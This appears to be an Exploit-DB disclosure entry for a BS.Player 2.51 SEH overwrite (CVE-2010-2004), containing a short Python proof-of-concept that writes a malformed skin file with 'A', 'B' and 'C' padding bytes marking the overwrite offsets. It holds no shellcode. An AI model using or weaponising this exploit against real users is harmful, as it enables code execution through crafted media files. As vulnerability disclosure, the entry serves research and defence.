BS.Player 2.51 - SEH Overwrite Vulnerability

2010-01-15T00:00:00
ID EDB-ID:11146
Type exploitdb
Reporter Mert SARICA
Modified 2010-01-15T00:00:00

Description

BS.Player v2.51 SEH Overwrite Vulnerability. CVE-2010-2004. Local exploit for windows platform

                                        
                                            # BS.Player v2.51
# Software Link: http://www.bsplayer.com/bsplayer-english/download-free.html
# SEH Overwrite Vulnerability
# http://www.mertsarica.com

junk = "[Options]\nSkin="

vulnerability = junk + "\x41"*496 + "\x42"*4 + "\x43"*4

try: 
   vulnerable = open("vulnerable.bsi",'w') 
   vulnerable.write(vulnerability) 
   vulnerable.close() 
   print "Vulnerable file created!\n"
except: 
   print "Error occured!"